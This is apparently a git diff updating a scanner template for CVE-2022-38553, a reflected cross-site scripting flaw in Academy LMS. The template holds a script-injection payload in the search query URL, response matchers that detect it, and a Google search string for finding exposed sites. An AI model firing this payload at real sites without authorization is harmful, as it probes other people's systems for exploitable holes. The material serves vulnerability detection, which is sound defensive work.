Update CVE-2022-38553.yaml
parent
4abcc8e3d9
commit
fe3bfd1276
|
@ -13,26 +13,29 @@ info:
|
|||
classification:
|
||||
cve-id: CVE-2022-38553
|
||||
metadata:
|
||||
verified: true
|
||||
google-query: intext:"Study any topic, anytime"
|
||||
tags: cve,cve2022,academyLMS,xss
|
||||
tags: cve,cve2022,academylms,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
|
||||
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
- 'Study any topic'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- 'text/html'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue